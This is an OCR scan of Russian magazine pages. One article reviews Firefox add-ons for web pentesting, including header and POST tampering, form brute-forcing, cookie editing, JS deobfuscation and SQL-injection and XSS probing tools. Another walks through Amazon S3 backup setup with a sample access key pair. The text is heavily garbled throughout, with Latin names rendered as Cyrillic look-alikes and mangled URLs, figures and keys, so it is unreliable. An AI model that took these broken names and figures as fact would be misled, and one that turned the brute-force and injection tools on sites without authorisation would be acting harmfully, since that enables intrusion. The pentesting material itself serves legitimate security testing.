РІМВЕРРРШТШб'А В РІВЕРОХ'Е 

Любой пентест страницы начинается с 
анализа: с чем, собственно, имеешь дело. 
Самописный, криво написанный движок для 
сайта, который можно оформить как учебник 
«Ошибки программиста» — настоящий пода- 
рок для хакера. Хотя и готовые движки СМ5/ 
форумов/блогов, которые все активно исполь- 



зуют, но редко когда вовремя обновляют, пре- 
доставляют огромный простор для деятельно- 
сти. А если знать, с каким решением имеешь 
дело, то можно быстро попробовать найти 
сплойт или запись в багтраке. Распознать 
тот или иной движок можно по ряду харак- 
терных признаков. Например, тег <теІа 
пате^'депега^ог" сопіепіУѴѴогсІРгезз 2.8.4" 

/> явно говорит о том, что сайт крутится на 
ѴѴогсІргезз'е. Причем ковырять сорцы самому 
в поисках характерных меток необязательно, 
потому как это самостоятельно может сделать 
плагин ѴѴарраІугег. В случае, если движок, на 
котором крутится сайт, успешно распознается, 
его логотип отображается в адресной строке 
браузера. Это очень удобно. Уже сейчас в 
базе ѴѴарраІугег есть данные по всем самым 
популярным скриптам для создания порталов, 
блогов, форумов, хостинг-панелей, электрон- 
ных магазинов. Не менее успешно можно 



определять используемый ^-фреймворк 
и аналитические средства (вроде Ооодіе 
Апаіубсз). На официальном сайте плагина 
даже можно посмотреть статистику по попу- 
лярности каждого из решений, собранного 
как раз с помощью плагина. Другой аддон 
— ЭЬоѵѵІР — никак не поможет узнать больше 
о самой страничке, но зато покажет ІР-адрес 
серверов, на которых она крутится, и позволит 
быстро пробить адрес по различным ѵѵбоіз- 
сервисам. 

МАНИПУЛЯЦИЯ С НТТР-ДАННЫМИ 

Когда первое представление о том, с чем 
имеешь дело, есть, можно приступать к более 
активным действиям. Чтобы проанализиро- 
вать НТТР/НТТР5-трафик между браузером 
и веб-сервером, часто используются спе- 
циализированные тулзы вроде РісІсІІег'а. Но 
посмотреть, что передается серверу, и что от 
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ГѴЛЧДТк ѴпгеіРтг** 2.Ч. ? 



6І — 1,4 ІіЕ 




Удобный просмотр НТТР-заголовков 



него возвращается обратно, вполне реаль- 
но без посторонних программ. Достаточно 
лишь установить плагин НіТрЕох или 1_іѵе 
НТТР Неабегз. Обе в очень удобной форме 
позволяют мониторить и анализировать весь 
входящий и исходящий НТТР-трафик, в том 
числе хедеры запросов и ответов, кукисы, 
содержание Р05Т-запросов и т.д. Понятно, 
что одним только снифингом не обойтись — 
часто необходимо «на лету» изменять параме- 
тры запроса или хедеров и изучать реакцию 
приложения. Нет проблем: МобТу Неабегз 
позволит добавлять, изменять и, что важно, 
фильтровать различные хедеры в запросах. 

Ты можешь изменить значение ІІзег Адепі и, 
например, проспуфить НТТР-запрос так, как 
будто он выполняется с мобильного устрой- 
ства. Впрочем, если часто приходится подде- 
лывать именно информацию об используемом 
браузере, но лучше задействовать специали- 
зированный аддон — ІІзег Адепі ЭѵѵТсЬег, 
позволяющий сделать это за несколько кли- 
ков мышью. 

Татрег Оаіа — это еще более продвинутое 
средство, которое на особом счету в копилке 
любого пентестера. Помимо спуфинга соб- 
ственно заголовков оно позволяет изменять 
данные, передаваемые в Р05Т-запросах. 
Напомню, что если форма для отправки 
использует метод СЕТ, то передаваемые 
данные оформляются в виде ключей в НПІ_, и 
«играться» с ними можно прямо в адресной 
строке браузера. В случае с методом РОСТ 
данные формы оформляются в особо соз- 
данной структуре, и здесь без специальной 
утилиты, позволяющей с ними манипули- 
ровать, не обойтись. Сложно даже предста- 
вить, сколько раз Татрег 0а1:а появлялся в 
наших ѴізиаІНаск'ах. Но каким бы удобным 
ни был аддон, он не позволяет выполнять 
автоматические аттаки. Например, его никак 
нельзя использовать для брутфорса формы 



авторизации. Ну и ладно, для брутфорса 
СЕТ- и РОСТ-форм есть отдельный плагин 
— Рігебогсе. Понятно, что подбор паролей 
является главной задачей подобного плагина, 
и, что приятно, он позволяет как генерировать 
случайные пароли с учетом заданных параме- 
тров, так и использовать для атаки словари. 
Мало брутфорса, хочешь устроить жесткий 
фаззинг во всех местах ввода данных? Тогда 
аддон ЕиггуЕох — к твоим услугам. 

ИГРЫ С КУКИСАМИ 

Важная часть данных, которыми обмени- 
вается веб-сервер и браузер — это кукисы. 
Каждый раз, когда форум узнает тебя, а не 
спрашивает имя и пароль заново, в этом 
участвуют кукисы и сессии. Если немного с 
ними помухлевать, вполне реально добиться 
интересного результата. Увы, все, на что спо- 
собен сам РігеЬх — это кнопка «Удалить все 
соокіез», да и то не всегда работает как надо 
(подробности чуть ниже]. Чтобы иметь интер- 
фейс для прямого доступа к кукисами, придет- 
ся устанавливать плагин АсМ N Ебіі: Соокіез, 
позволяющий добавлять и редактировать 
параметры текущей сессии и все сохраненные 
кукисы. Если же тебе интересно, кто и в какой 



Уф т ‘ 

ѴѴарраІуіег определяет движок 
сайта 

форме сохраняет «плюшки», которые скопом 
накапливаются у тебя на жестком диске, реко- 
мендую установить насадку АИсоокіез — та в 
удобной форме будет логировать всю инфор- 
мацию в текстовый файл. Еще один занятный 
и полезный плагин для работы с кукисами — 
это СоокіеЭѵѵар. После установки у тебя появ- 
ляется тулбар, благодаря которому ты можешь 
быстро переключаться между различными 
профайлами, в каждом из которых хранится 
свой набор «плюшек». Я, к примеру, активно 
использую его, чтобы одновременно работать 
с разными аккаунтами на сервисах Соодіе и, в 
частности, бтаіі. 

КОВЫРЯЕМ ^-СКРИПТЫ 

Если взять тот же самый Ота і I, ЕасеЬоок 
да и вообще любое веб-приложение, то оно 
буквально изобилует кодом на ЧаѵаВсгірЕ А 
там, где много кода, есть много ошибок, кото- 
рые мы любим искать. К счастью, одним из 
самых мощных плагинов для Рігебох является 
именно отладчик баѵазсгірі: — ЕігеЬид. По 
совместительству это еще и самый лучшей 
дебаггер для 65 в принципе, который идеаль- 
но подходит для того, чтобы разобраться с 
чужим 65-кодом. С помощью ЕігеЬид ты легко 
можешь установить брейкпоинты в нужных 
местах скрипта, указывая на то, что выполне- 
ние сценария нужно остановить при достиже- 
нии нужной строчки кода. Поддерживаются и 
Т-ЬгеакроіпЕы, когда точка останова сраба- 
тывает только при наступлении оговоренного 
условия. Как только выполнение скрипта 
остановилось, ты можешь продолжить его 
выполнения пошагово, внимательно отсле- 
живая значение всех переменных и объектов. 
Причем можно даже просмотреть значение 



Как исправить несовместимость 
версии плагина и браузера? 



Еігеіюх — это быстро развивающийся браузер, для которого очень часто выходят новые 
версии. Этого нельзя сказать о многих плагинах, которые когда-то были опубликованы 
авторами, попали в репозиторий и были благополучно заброшены. При этом в Еігеіюх’е 
есть защита от дурака: если в плагине указано, что он совместим с версией браузера 
3.5, то со свежей 3.6.3 он уже не установится. На обновление со стороны автора можно 
не надеяться, и как же тогда быть? Самый надежный путь — установить аддон N і д Ы: Іу 
Тезіег Тооіз. Теперь во время подключения устаревшего плагина ты получишь не отказ 
в установке из-за ошибки совместимости, а предложение включить аддон на свой 
страх и риск. 
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сложных выражении, состоящих из различ- 
ных переменных; для этого к твоим услугам 
система ѵѵаІсН'ей. Впрочем, даже если просто 
в коде навести курсор на какую-то пере- 
менную во время выполнения скрипта, то 
отладчик выдаст подсказку с его текущим 
значением. РігеЬид интегрируется в Рігеіюх 
на глубоком уровне и позволяет в реальном 
времени изменять и отладить не только 
^-сценарии, но и выполнение НТМІ_-кода, 
С55 на абсолютно любой странице. Одна из 
моих любимых фишек — опция Іпзресі, когда 
ты кликаешь на нужный тебе элемент сайта, 
а РігеЬид мгновенно находит в сорцах код, 
который этот элемент реализует. Отладчик 
неплохо справляется с определением всех 
связных файлов со страницей, хотя для 
этой цели еще лучше подходит отдельный 
плагин — Ѵіеѵѵ Берепсіепсіез. Это особенно 
важно, когда имеешь дело со сложным веб- 
приложением, подгружающим массу отдель- 
ных файлов с Э5/С55-кодом. 

Интерпретация и компиляция (да-да, часть 
Э5-кода компилируется встроенным в брау- 
зер Э5-движком с целью увеличения произ- 
водительности] производится на клиентской 
машины, и чтобы защитить свой код от копи- 
рования, разработчикам приходится исполь- 
зовать важный прием — обфускацию кода. 
Техника на особом счету и у разработчиков 
сплойтов, которые, во-первых, маскируют 
таким образом свои детища от сигнатур- 
ных антивирусов (ведь не так сложно рас- 
познать шеллкод в ЭаѵаЗсгірІ:] , а, во-вторых, 
скрывают саму технику эксплуатирования 
уязвимости в браузере. Если прочитаешь 



статью «Операция Аврора», то разберешь- 
ся, как справится с простейшим приемом 
шифрования сплойта. Существенно упро- 
I стить задачу, а во многих случаях даже все 
сделать за тебя может плагин ЭаѵаЗсгірІ: 
ОеоЫФзсаІюг. После установки у тебя всегда 
будет возможность посмотреть, какой ^-код 
выполняется на странице, причем даже в 
том случае, если он генерируется (в част- 
ности расшифровывается) на лету. Нужно 
лишь вызвать плагин из меню «Тооіз» и 
посмотреть, какие скрипты на этой странице 
в ы п ол н я ются/ ко м п и л и ру ются . 

ИНЪЕКЦИИ, ХЗЗ, ОТСУТСТВИЕ 
АВТОРИЗАЦИИ 

Если тебе нужен инструмент для помощи 
в поиске ХЗЗ-дыр, осуществления ЗОБ- 
инъекции и выполнения прочих атак прямо 
внутри сайта, то самое время установить в 
Еі гебох’е тулбар НаскВаг. Фишка в том, что 
с его помощью ты сможешь очень быстро 
выполнять ряд тривиальных действий для 
поиска уязвимостей в скриптах, вроде под- 
становки зловредных значений в разные 
места ввода данных. К тому же в НаскВаг 
встроено несколько инструментов, позво- 
ляющих зашифровать зловредный запрос, 
позволяя обойти простейшие фильтрации 
параметров. Если дальше продолжать раз- 
говор про ЗОБ-инъекции, то тут есть специ- 
альный плагин с незатейливым названием 
ЗОИ Іщесбоп. В плагин забит ряд популяр- 
ных символьных комбинаций, которые могут 
нарушить целостность ЗОБ-запроса, логику 
выполнения скрипта и, соответственно, 
предоставить возможность реализовать 
атаку. Еще более автоматизированную 
атаку на БД предлагает ЗОБ Іпуесі: Ме, раз- 
работанную зесигііу-командой Зессот 
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БаЬз. В те значения, которые передаются 
скрипту на сервере, плагин вставляет 
«опасные» символы (вроде кавычки) и про- 
веряет, не вернулась ли в ответ страница с 
ошибкой базы данных. Поля для проверки 
выбираешь ты сам с помощью специ- 
ального интерфейса. От тех же ребят есть 
серьезный инструмент для поиска Х55- 
уязвимостей ХЗЗ Ме. Она работает анало- 
гичным образом и сабмитит НТМБ-формы, 
подставляя в поля отправляемой формы 
такие значения, которые теоретически 
могут выявить ХЗЗ-атаку. Если результиру- 
ющая НТМЕ-страница вернет специальное 
ІЗ-значение (боситепіѵиІпегаЫе=1:гие), 
тулза автоматически помечает страницу как 
потенциально уязвимую к ХЗЗ. 

АНАЛИЗ РІ.А5Н-С0ДЕРЖИМ0Г0 

Важная часть веба сегодня — это БІазЬ- 
компоненты, с помощью которых реа- 
лизуются интерактивные приложения. 
Анализировать 5ѴѴЕ-ки — непростая зада- 
ча, но кое-какую информацию об их работе 
выудить можно. В этом плане лакомым 
аддоном является БІазЬЬид, который рабо- 
тает в связке с ЕігеЬид'ом и позволяет под- 
робно изучать ЗѴѴЕ-ресурсы, встроенные в 
сайт. В ЕігеЬид'е появляется новая вклад- 
ка, на которой отображаются все «трейсы» 
приложения, а также АМЕ-данные, пере- 
дающиеся от и до сервера — это специаль- 
ные сообщения, в которых сериализируют- 
ся (проще говоря, упаковываются) объекты 
используемого во Еіазб языка АсЕопЗсгірЕ 
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Отладчик ГігеЬид 




Удобный менеджер прокси 



Другой плагин — РігеРІазЬ — позволяет помимо всего 
прочего просмотреть АсЕопЭсгірІ: классы, объекты, 
массивы, ХМІ_ и другие данные ЕІазЬ-компонента, при- 
чем опять же через РігеЬид сопзоіе. 

Тут надо понимать, что эти инструменты предназначены 
в первую очередь для разработчиков, но будут крайне 
полезны для изучения чужих 5ѴѴЕ-ок, например, прило- 
жений ВКонтакте. Оба аддона не работают без установ- 
ленного отладчика РігеЬид, который отличается от многих 
других надстроек для Рі гебох тем, что сам имеет плагины. 

АНОНИМНОСТЬ И БЕЗОПАСНОТЬ 

Если говорить о пентесте, нельзя не упомянуть аспекты 
своей собственной безопасности и анонимности. Возьмем 
обычное действие — работу через прокси. Зачастую их 
приходится использовать даже не для того, чтобы скрыть 
ІР. Сейчас полно сервисов, которые банально не работают 
с пользователями, у которых российский ІР: взять хотя бы 
Соодіе Ѵоісе, Рапбога Рабіо и т.д. А через американский 
соке — все отлично. Для того, чтобы добавлять в браузер 
нужные прокси и быстро между ними переключаться, нет 
лучше плагина, чем РохуРгоху. Если задача стоит как раз 
обмануть фильтрацию упомянутых сервисов, можно четко 
забить для них индивидуальные прокси из Америки, и 
браузер автоматически их будет использовать. Чтобы в 
любой момент переключиться на нужный прокси, нужен 
один клик мыши. Более того, плагин предоставляет неко- 
торые уникальные фишки, например, циклическое пере- 
ключение по заданному списку соксов — вот и задачка 
для тех, кто будет анализировать логи. Если для обес- 
печения анонимности ты используешь Тог, то к Еігеіюх'у 
обязательно нужно подключить ТогЬиІТоп, включающий 
и выключающий безопасное соединение. Продолжая 
тему шифрования, крайне рекомендую закачать аддон 
ЕігеОРО. В этом случае ты сможешь прямо из браузера 
шифровать, дешифровать, подписывать текст и про- 
верять чужую цифровую подпись, в том числе в Отаіі, 
используя открытый проект ОпиРО. Большая головная 
боль при посещении различных ресурсов — так назы- 
ваемые Тгаскіпд-кукисы, которые не имеют срока год- 
ности и используются ресурсами для отслеживания твоей 
активности (например, возвращаешься ли ты на сайт или 




Деобфусцированный 35-код 



заходишь на него в первый раз]. Это значит, что они не 
удаляются как обычные кукисы через некоторое время, 
а продолжают жить в системе. Это особенно касается 
ЕІазЬ-соокіез, которые создаются на компьютере как 
БЗО-объекты (Босаі ЭЬагеб О^есіз] флеш-плеером — их, 
как правило, вообще не может удалить браузер, даже Подборка фаззеров 

не подозревая об их существовании. А зачем тебе на ждеттебя на нашем 

компьютере свидетельства посещения пикантных сай- ОѴО-диске. 
тов? Для предотвращения появления Тгаскіпд-кукисов в 
системе специально разработан плагин ВеНегРгіѵасу. 

В обязательном порядке необходимо установить еще один 
плагин — ІЧоЭсгірЕ Он делает одну простую вещь — вооб- 
ще отключает выполнение скриптов на сайте. Это един- 
ственный гарантированный способ серфить зараженные 
сайты, откуда пачками грузятся трояны, а также защитить 
себя от Х55 и Сііс^аскіпд атак :]. Тут стоит заметить, что 
скрипт отключит не только Э5, но и ^ѵа и ЕІазЬ — все 
технологи, которые могут выполнять код на твоем компью- 
тере с удаленного хоста. В плане определения малвари 
на сайте хорошо зарекомендовал себя еще и Еі гекеерег, 
использующий правила известной Ю5-системы ЗпогЕ 

Н-твики 

Если посмотреть описание функций любого продвинутого 
трояна, то среди прочего обязательно заметишь опцию 
подмены контента. Благодаря ей злоумышленник может 
скрыть на сайте те элементы, которые могут вызвать 
подозрения пользователя (например, сообщения о 
неудачной авторизации] или, наоборот, подсунуть в форму 
для ввода новое поле, которого в изначальной форме 
не было. Для тестирования замен нередко использует- 
ся аддон Огеазетопкеу, позволяющий изменять про- 
сматриваемые страницы на лету. Впрочем, его можно 
использовать и для вполне мирных целей, например, 
чтобы избавиться от назойливых элементов на каком-то 
сайте. Изменения описываются с помощью скриптов — 
большая база уже готовых сценариев доступна на сайте 
изегзегіріз.огд. Еще одна хитрость — реализовать авто- 
матизированные проверки и тестирования с помощью 
макросов. Один раз записав сценарий и показав браузеру 
последовательность действий, можно воспроизводить их 
сколько угодно раз в автоматическом режиме. Это воз- 
можно с помощью аддонов іМасгоз, ТезЮепДѴѴеЬ, а также 
СЬіскепіюоЕ 

А какие твики и плагины знаешь ты? Присылай, и мы 
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Атагдп 33 ' * 

для обычных 
смертных 



Современные технологии облачных 
вычислений для хранения файлов и бэкапа 

Появление облачных технологий позволило любому стартапу иметь в распоря- 
жении продвинутую инфраструктуру для хранения файлов. Она не упадет и 
выдержит любую нагрузку пользователей - это раз. Она бесконечно расширяе- 
ма - это два. И стоит дешевле, чем приобретать оборудование самому - это три. 
Но разобраться с облачными вычислениями и использовать их могут не только 
специалисты ТѵѵіНег или другого масштабного проекта - это под силу каждому. 
И более того - полезно не только разработчикам. 



В о время загрузки страниц многих 
крупных интернет-проектов 
нередко можно заметить, что 
ресурсы вроде картинок и видео 
зачастую подгружаются откуда-то 
зЗ.атагопаѵуз.сот . Легко догадаться — они 
находятся в облаке, а именно в Атагоп 
53. Иногда не все так очевидно: кто же 
мог подумать, что известный сервис для 
синхронизации данных между компьютерами 



БгорЬох [ ѵѵѵѵѵѵ.сІгорЬох.сопп ) — это красивый, 
многоплатформенный клиент для доступа к 
файлами, которые опять же хранятся на Ата- 
2 оп 53? И ведь как, заметь, хорошо работает! 
Не надо объяснять, зачем высоконагруженным 
проектам необходима надежная площадка 
для размещения файлов, которая 99.9% 
будет онлайн. Но это может понадобиться и 
обычному пользователю. Банальная задача 
— сохранность данных. После того как упал 



мой внешний жесткий диск с огромным 
количеством фотографий, я задумался о 
том, что неплохо сделать бэкап. Но куда? 
Выкладывать на йіскг или Яндекс. Фотки 
удобно, но все-таки далеко не все фотографии 
хочется выкладывать в фотохостинг, даже 
под замок. Называйте меня параноиком. 
Больше того, фотки — это фотки, а как быть 
с бэкапом других файлов? Есть несколько 
серверов, откуда периодически необходимо 
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Работа с облачным хранилищем через плагин БзРох 



сливать несколько сотен мегабайт бэкапа, но 
надежной площадки я так и не нашел. Кто 
гарантирует, что жесткий диск на выделенном 
сервере, куда отправляются бэкапы, точно 
так же не прикажет долго жить? О бэкапе на 
любые носители, в том числе ВѴЭ, не хочу 
даже задумываться: это дико неудобно и 
вообще прошлый век. В общем, именно в тот 
самый момент, когда я задумался о площадке 
для надежного хранения файлов, мне пришла 
в голову идея об Атагоп 53. И вот почему. 

НТО ТАКОЕ 33? 

Атагоп 53 расшифровывается как Атагоп 
5ітрІе 5Тогаде 5егѵег — простое хранилище 
файлов от Атагоп. Если говорить кратко, то 
это просто хранилище в Интернете. «Причем 
тут облачные вычисления, это же обычный 
хостинг?», — возможно, заметишь ты. Сейчас 
я объясню. У обычного хостинга всегда есть 
несколько ограничений. Первое самое про- 
зрачное — объем жестких дисков (особенно, 
если это касается дорогих 5С5І]. Упрешься 
в потолок — нужно делать апгрейд. Со вто- 
рым ограничением сталкиваешься, когда 
на ресурс неожиданно приходит чрезмерно 
много пользователей, и сервер банально... 
падает. Или другой вариант — не хватает 
интернет-канала, и пользователи тянут файлы 
так, как если бы оказались 10 лет назад на 
Зб.бК-модеме. Мало этого, если вдруг жест- 
кий диск на сервере полетит, то лучшее, на 
что придется надеяться — это лишь когда-то 
сделанный бэкап. Увы, даже с резервной 
копией, сделанной несколько часов назад, 
можно потерять тонну важных данных. А 
теперь посмотрим на Атагоп 53. Тебе предо- 
ставляется ровно столько пространства в 
хранилище, сколько нужно. Хоть 10 Мб, 1 Гб 
или даже 5000 Гб — никаких ограничений 
(оговорюсь, кроме максимального размера на 
файл — 5 Гб]. В датацентрах Атагоп исполь- 
зуется специально проработанное оборудо- 
вание и распределенные файловые системы, 
позволяющие бесконечно масштабироваться. 
Те же самые знаменитые технологии, кото- 
рые давным-давно использовались, скажем, 



в Ооодіе для хранения огромных массивов 
данных, но в виде услуги для конечного поль- 
зователя. Что не менее важно, Атагоп 53 
гарантирует сохранность данных. Любой объ- 
ект в обязательном порядке избыточно хра- 
нится одновременно в нескольких местах. 

Как только объект попадает в хранилище, 53 
заботиться о его надежности, проверяя и в 
случае необходимости увеличивая недоста- 
ющую избыточность данных. Помимо этого, 

53 также регулярно проверяет целостность 
хранимых данных, используя контрольные 
суммы. Если вдруг обнаруживаются наруше- 
ния, целостность восстанавливается опять же 
с помощью тех самых избыточных данных. Что 
все это дает? Много «девяток»: 

• 99.99% доступность файлов в течение года; 

• 99.999999999% надежности. 

Стоп, я еще не сказал о системе версионно- 
сти. Ты можешь использовать ее для сохране- 
ния, извлечения и восстановления предыду- 
щих версий объекта, хранящихся в Атагоп 
53. Запрос по умолчанию извлекает послед- 
нюю версию. Но более старую модификацию 
файла можно закачать, указав версию файла. 

сколько это стоит? 

Конечно, услуги Атагоп 53 не бесплатны, 
как и за все хорошее, придется платить. Но 
я бы никогда не стал рассказывать об облач- 
ных вычислениях в таком ключе, если бы не 
более чем подъемные цены. Если речь идет 
о небольших объемах для хранения (на бэкап 
каких-то важных файлов) и небольшом тра- 
фике, то получаются фактически копейки. В 
Атагоп используется регрессионная шкала: 
чем больше хостишь, тем дешевле тебе обхо- 
дится гигабайт хранилища. До 50 Тб стоимость 
гигабайта составляет $0.150. Примерно 4.5 
рубля за гигабайт в месяц! Правда, отдельно 
придется платить за трафик (пока бесплатно), 
а также запросы для обращения к объектам 
($0.01 за 1000 запросов). Чтобы сразу понять, 
сколько примерно ты будешь тратить, можешь 
воспользоваться специальным калькулято- 
ром — ( саІсиІаІог.зЗ.ата^опаѵѵз.сопп/саІсб. 
Нт! ). Выбираем в меню, что хотим подсчитать 




Все объеты находятся внутри 
конкретного ЬискеГа с уникаль- 
ным именем. У каждого объекта 
есть идентификатор. У объекта 
может быть несколько версий. 




Пара Асееве Кеу Ш и Бесгеі Асееве 
Кеу для доступа Бз-хранилищу 



стоимость для сервиса Атагоп 53 (это не 
единственный проект облачных вычислений 
от этой компании), и вводим данные по свое- 
му хранилищу бэкапов. Я использую около 
20 Гб для хранения файлов, входящий тра- 
фик составляет примерно 5 Гб, а входящего 
практически нет (укажем для верности тоже 
5 Гб]. Количество запросов Р1Я/С0РУ/Р05Т/ 
Ы5Т — около 5 тысяч, столько же укажем для 
запросов (ЗЕТ. Заполнив поля, нажимаем 
на «АсИ Іо ЫН» и удивляемся цене справа. 
Получается, за сверхнадежное хранилище с 
поддержкой версионности, которое доступно 
99.99% времени, придется платить $3.66 в 
месяц, а это чуть больше 100 рублей. Не то 
чтобы очень большая плата за спокойствие 
и гарантию сохранности данных. К тому же, 
сам факт использования самых передовых 
технологий: разобравшись с 53 для хранения 
бэкапов, в случае необходимости легко потом 
подключить сіоисі-зіюгаде к своему высокона- 
груженному проекту. Если у тебя есть таковой, 
но при этом хостинг постоянно отказывает, а 
ширины канала не хватает, чтобы выдержать 
часы пик, обязательно посчитай расходы на 
содержание 53. Вполне вероятно, что при тех 
же затратах ты сможешь получить беспро- 
блемное хранилище в облаке, а быть может 
— даже дешевле! Тут есть еще одна хитрость. 

В калькуляторе есть один непонятный на 
первый взгляд параметр Вебисеб Вебипбапсу 
51:огаде (ВВ5). Это относительно недавно 
появившаяся опция в 53, позволяющая 
уменьшить расходы за счет покупки дискового 
пространства в менее надежном контейне- 
ре. Это, конечно, не значит, что файлы будут 
хоститься на каком-нибудь старом оборудо- 
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вании или вроде того. Конечно, нет — просто 
для файлов в таком хранилище будет исполь- 
зовано меньшее количество избыточности и 
меньшее количество репликаций. Но даже в 
таком случае надежность хранения будет в 
400 (!) раз выше, чем просто дома на жестком 
диске. Такое хранилище дешевле (это легко 
проверяется калькулятором], но теоретически 
менее надежно. Тут важно еще сказать, что у 
Атагоп 53 есть три региона, в которых рас- 
положены датацентры — два в Америке, один 
в Ирландии и один в Сингапуре. Это сделано 
для того чтобы минимизировать задержки: 
лучше всего выбирать регион ближний к 
себе, но при этом иметь в виду, что цена 
между различными регионами может незна- 
чительно отличаться. 

КАК ПОДПИСАТЬСЯ? 

Какими бы пафосными ни были разговоры об 
облачных вычислениях, начать их использо- 
вать — плевое дело. В первую очередь, как 
вводится, необходимо зарегистрироваться: 
жмем на кнопку «5іпд ир Тэг Атагоп 53» на 
официальной странице сервиса аѵѵз.атагоп. 
сот/зЗ. Если ты до этого момента покупал 
что-то в интернет-магазине Атагоп (а я, 
например, покупал в нем В а б а г- детектор 
вдвое дешевле, чем он продается в России], 
то можно использовать уже имеющийся акка- 
унт. В противном случае придется заполнить 
несколько стандартных форм. Так или иначе, 
аккаунт в Атагоп'е у нас есть, теперь необ- 
ходимо обзавестись доступом к самому 53, 
а вернее всем Атагоп ѴѴеЬ 5егѵісе (АѴѴС). 
Вводим свое имя, почтовый адрес, пароль 
и выбираем метод платежа. Для оплаты, 
как ни крути, понадобится карта междуна- 
родной платежной системы, то есть Ѵіза или 
Мазіегсагб. Ты можешь скривиться: «Мол, 
фигня какая: ни ѴѴеЬтопеу, ни Яндекс. Денег 
нет — не буду пользоваться». На самом деле, 
время диктует новые правила. Пластиковой 
картой можно расплатиться везде: я даже 
не говорю об иностранных магазинах и про- 
ектах, их начали нормально принимать везде 
в России. Затраты минимальны: если кар- 
точка нужна только для оплаты в интернете, 
сгодится виртуальная версия (тебе выдается 
только номер карты, время истечения и 
сѵѵ2-код вместо самой пластиковой карты]. 
Обслуживание Ѵіза Ѵігіиоп стоит 200 рублей 
в год, при этом ты можешь расплачиваться 
ею без комиссии, как в случае с электронны- 
ми деньгами. Такую карту принимают везде, 
где есть логотип Ѵіза — проще говоря, ею 
можно расплатиться везде :]. Атагоп спишет 
с карточки один доллар, чтобы проверить 
валидность карты, и через некоторое время 
вернет его. Это поначалу настораживает и 
смущает: «Один доллар, и все?». Так и есть 
— сервис использует оплату постфактум. 
Сколько будешь использовать пространства, 
сколько трафика нагенеришь — за столько 
и заплатишь. Очень удобно и гибко. Через 
несколько минут после регистрации на почту 




придет письмо с подтверждением того, что 
твой аккаунт активирован. Можно начинать 
работать. 

НАШЕ ПЕРВОЕ ОБРАЩЕНИЕ 
К ХРАНИЛИЩУ 

Прежде чем рваться в бой, необходимо 
разобраться, как собственно устроен 53 и 
как работать с файлами, которые находятся 
в облаке. В платформе от Атагоп нет при- 
вычной файловой системы — она распреде- 
ленная. Здесь нет такого понятия как файл 
или каталог: на практике это означает, что 
ты не сможешь взять РТР- или 55Н-клиент и 
обратиться к ним. Атагоп 53 концептуально 
— это очень простое кеу-Ьазеб хранилище. 
Это означит, что когда ты размещаешь дан- 
ные, им присваивается уникальный ключ 
объекта, который дальше может быть исполь- 
зован, чтобы эти файлы получить. Каждый 
объект находится внутри так называемого 
ЬискеЕа — это фундаментальное понятие 53, 
означающее контейнер для хранения любого 
количества объектов. Но поскольку ключ 
может быть строкой, то он может имитиро- 
вать иерархию каталогов. Последнее озна- 
чает, что если у тебя есть файл зсаппег.гір в 
каталоге х!ооІ 2 , то ты можешь залить его в 
хранилище 53 и присвоить ему ключ «хГооІг/ 
зсаппег.гір». Любые объекты находятся в 
облаке не сами по себе, а внутри так назы- 
ваемого ЬискеСа. Виске! или ведро — это 
концептуальное понятие контейнера внутри 
Атагоп 53, в котором может находиться 
нелимитированное количество объектов. 
Название Ьиске! должно быть уникально по 
всей системе Атагоп 53, потому как являет- 
ся идентификатором для доступа к объектам 
ЬискеСа извне. Например, если объект назы- 
вается «хГооІг/зсаппег.гір» и находится в 
ЬискеЕе «хакер», то к нему можно обратить- 
ся, используя ЦВЕ ШрУ/хакер.зЗ.атагопаѵѵз. 
сотМооІг/зсаппеггір . Обращаться к 
ЬискеЕам можешь только ты сам, а можешь 
разрешить это делать другим. С помощью 
атрибутов объекта ты можешь разрешить 
или запретить доступ другим людям, которые 



хотят скачивать или заливать файлы в твои 
ЬискеЕы. Так, чтобы любой человек мог ска- 
чать объект из твоего хранилища по адресу 
ЬЛрУ/хакер.зЗ.атагопаѵѵз.сопп/хІооІг/зсаппег. 
2 Ір . ему должны быть присвоены права 
для чтения «АН». Для работы с объектами 
используются технологии ВЕ5Т и 50АР, а все 
операции выполняются с помощью запро- 
сов (именно поэтому за них надо платить]. 
Пять основных операций: создать Ьиске!, 
записать объект (указав уникальный ключ и 
Ьиске!], считать объект (можно скачать файл 
по НТТР или ВИТоггеп! протоколу], удалить 
объект, вывести листинг ключей (получить 
список всех ключей, хранящихся внутри 
указанного «ведра»]. Простая архитекрута 
позволяет масштабировать систему, а раз- 
работчикам предоставляет полную свободу 
для работы с облаком. Нам же для исполь- 
зования 53 как места для бэкапа и вообще 
хранилища файлов, желательно использо- 
вать привычную структуру каталогов. Это 
несложно, поэтому есть немало решений, 
позволяющих представить данные так, чтобы 
это было удобно и привычно для обычного 
пользователя. 

ОРГАНИЗУЕМ ФАЙЛОВОЕ ХРАНИЛИЩЕ 

Так как же получить доступ к этим ЬискеЕа и 
создать, наконец, свое первое хранилище? 
Есть несколько вариантов. Можно восполь- 
зоваться бесплатным расширением для 
Еігеіюх — 53Еох ( ас!сІоп5.ппо2ІЦа.огд/еп-Ц5/ 
Егеіюх/асІсІоп/3247 ]: с помощью него можно 
делать практически все. Устанавливается 
как и любой другой аддон, но при первом же 
запуске обязательно выругается по поводу 
отстствующих аккаунтов. Можешь не пробо- 
вать вводить сюда етаіі и пароль для досту- 
па к личному кабинету Атагоп — ему нужно 
совсем другое. В 53 используется довольно 
мощная модель безопасности, предусма- 
тривающая различные способы авториза- 
ции. Самый простой способ обратиться к 
хранилищу — использовать пару ключей 
Ассезз Кеу Ю — 5есге! Ассезз Кеу (они же 
используются для симметричного шифрова- 
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СІоисІВеггу Ехріогег поддерживает пере- 
нос файла внутри облака 



Выбираем каталоги для бэкапа 



> іпіо 

Построенный на базе 
Атагоп 53 известный 
сервис для хранения 
и синхронизации 
данных БгорЬохтакже 
успешно можно ис- 
пользовать для бэка- 
па. Изначальные 2 Гб 
для хранения данных 
— это немного, но 
объем можно про- 
качать до 5 Гб, если 
через тебя в сервисе 
зарегистрируются не- 
сколько человек. 
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ния]. Получить ключи, создать новые или заблокировать 
существующие можно в разделе 5есигіІу Сгебепііаіз, 
в который можно попасть из своего личного кабинета 
( аѵуз.атагоп.сот/ассоипі ]. Выглядят они примерно так: 

Ассезз Кеу ІБ: АКІАІЕАХА8ВКАБѴВХЗБ0 
ЗесгеС Ассезз Кеу: 6Хг1пЕР25зѴ^РРс7ѵгБ6АиЪНе 
ЪТМ5 4 Бе 0 вША йС а О 

Все, теперь создаем новый аккаунт в 53Рох, вводим ключи 
— и, вуаля, соединение устанавливается. Выглядит 53Рох, 
как и любой файловой менеджер с двумя панелями: с 
